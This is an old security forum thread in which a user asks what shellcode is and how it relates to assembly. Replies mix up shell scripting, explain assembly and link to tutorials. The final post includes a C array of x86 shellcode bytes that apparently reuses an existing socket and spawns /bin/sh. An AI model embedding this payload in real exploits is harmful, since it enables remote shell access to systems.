Shellcode

Printable View

July 20th, 2002, 09:47 AM
Sudo

Shellcode

I've noticed that a alot of exploits use shellcode to execute code as the UID of the server/program. Could someone please explain or give some references as to what shellcode is and how it works? What is the relationship between shellcode and assembly? Any info on the topic would be appreciated, thanks.

--Sudo
July 20th, 2002, 11:42 AM
uid(zer0)

When you say shell code you mean shell scripting?

Shell scripting in Unix is like writing batch files in Windows but much more usefull. It would be useful to read shell man page (eg. if you using bash then type "man bash").
I don't see any relationships between assembly and shell scripting.
I recommend that you read http://www.tldp.org/LDP/abs/html/.
July 20th, 2002, 11:47 AM
Cicatrix

Well just a search on google will give you this results:

http://www.shellcode.com.ar/docz/bof...efmt-howto.txt
http://www.phrack.com/show.php?p=57&a=5 (WRITING SHELLCODE FOR IA-64)
http://www.w00w00.org/files/shellcode/ ( Index of /files/shellcode )
http://www24.brinkster.com/neolabs/p...shellcode.html (Programming a shellcode in SCO)
and etc...

I hope this wouldn't be used for illegal ativities.
July 20th, 2002, 01:39 PM
zepherin

Assembly is a programming language, some might say it's THE programming language, it's about as close the machine as you can get without useing 1's and 0's. Shell scripts are just scripts that are interprited by the shell you are useing. Shell scripts are great for automating tasks on a *nix box and interfaceing with pearl.
July 20th, 2002, 02:44 PM
droby10

i don't know how much detail you are looking for, this article may be of service at a very low level for your last question:

http://droby10.addr.com/tutorial/bof/appendage1.html
July 20th, 2002, 05:29 PM
Sudo

Quote:

When you say shell code you mean shell scripting?

No, When I say shellcode, I do not mean shell scripting. Here is an example of some shellcode:

char shellcode[] =
"\x89\xe2\x83\xec\x10\x6a\x10\x54\x52\x6a\x00\x6a\x00\xb8\x1f"
"\x00\x00\x00\xcd\x80\x80\x7a\x01\x02\x75\x0b\x66\x81\x7a\x02"
"\x42\x41\x75\x03\xeb\x0f\x90\xff\x44\x24\x04\x81\x7c\x24\x04"
"\x00\x01\x00\x00\x75\xda\xc7\x44\x24\x08\x00\x00\x00\x00\xb8"
"\x5a\x00\x00\x00\xcd\x80\xff\x44\x24\x08\x83\x7c\x24\x08\x03"
"\x75\xee\x68\x0b\x6f\x6b\x0b\x81\x34\x24\x01\x00\x00\x01\x89"
"\xe2\x6a\x04\x52\x6a\x01\x6a\x00\xb8\x04\x00\x00\x00\xcd\x80"
"\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe2\x31\xc0\x50"
"\x52\x89\xe1\x50\x51\x52\x50\xb8\x3b\x00\x00\x00\xcd\x80\xcc";

Thanks for the links Droby and Cicatrix. It looks like some heavy stuff.

Quote:

Originally posted here by Cicatrix
I hope this wouldn't be used for illegal ativities.

No no no... I am just a VERY curious guy.. Thanks.

--Sudo